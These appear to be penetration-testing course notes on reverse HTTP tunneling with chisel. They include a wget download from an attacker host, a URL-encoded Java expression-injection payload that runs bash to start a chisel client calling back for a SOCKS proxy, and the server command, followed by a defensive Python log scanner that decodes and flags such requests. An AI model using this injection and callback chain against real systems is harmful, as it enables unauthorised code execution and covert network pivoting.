Tunneling Theory & Practice
20.2.1 - HTTP tunneling with chisel
Chisel is an HTTP tunneling tool that encapsulates our data stream within HTTP. It also runs the SSH protocol inside the tunnel, so the tunneled data is encrypted. Chisel uses a client/server model. In this example the client command is delivered through a web injection payload.
We'll need to transfer the chisel binary to the target.
Download the binary from our HTTP (Apache) server on Kali. The request should appear in the Apache access log, which confirms the target can reach us.
wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel
We can also run tcpdump on Kali to log any incoming traffic on port 8080, the port the chisel server will listen on.
sudo tcpdump -nvvvXi tun0 tcp port 8080
Note that the version of Chisel you use can matter here: some versions of glibc on targets don't work with Chisel binaries compiled with a newer version of Go.
Run the chisel client on the target, here through a URL-encoded web injection vulnerability (the decoded payload runs /tmp/chisel client 192.168.118.4:8080 R:socks). In other situations we may instead run the same command from a remote command line.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/
Run the Chisel server on Kali with reverse tunneling enabled (the server must be listening before the client connects). Once the client is connected, we can check that the SOCKS proxy is listening with ss -ntplu
chisel server --port 8080 --reverse
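From the defender's side, the injection request used above lands URL-encoded in the vulnerable application's access log. The following Python is an added example, not from these notes or the chisel project: it URL-decodes request paths from constructed sample Apache log lines and flags expression-injection and chisel client indicators (the indicator patterns are my own assumption of what to look for).

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format). The second line carries
# the URL-encoded expression injection shown in the notes above; the third is a
# simple ${7*7} probe that an attacker might send while testing for injection.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:10:01:09 +0000] "GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/ HTTP/1.1" 200 17 "-" "curl/7.88.1"
10.0.0.9 - - [10/Mar/2024:10:01:15 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 88 "-" "curl/7.88.1"
"""

# Pull client IP, timestamp, method and raw request path out of a combined-format line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

# Assumed indicators: EL/SpEL-style expression syntax, Java code-execution
# primitives, and the chisel client command-line syntax (R:socks reverse proxy).
INDICATORS = {
    "el_injection": re.compile(r"\$\{.*\}"),
    "script_engine": re.compile(r"ScriptEngineManager|ProcessBuilder|Runtime\.getRuntime"),
    "chisel_client": re.compile(r"\bchisel\s+client\b|\bR:socks\b"),
}

def decode_request(path: str) -> str:
    """Fully URL-decode a request path; the loop also unwraps double encoding."""
    prev, cur = None, path
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur

def scan_log(text: str) -> list[dict]:
    """Return one finding per log line whose decoded path matches any indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        decoded = decode_request(m["path"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "indicators": hits, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["indicators"], f["decoded"][:80])
```

Matching on the decoded path is what matters: the raw line contains none of the indicator strings, so a grep for "chisel" on the undecoded log would miss it.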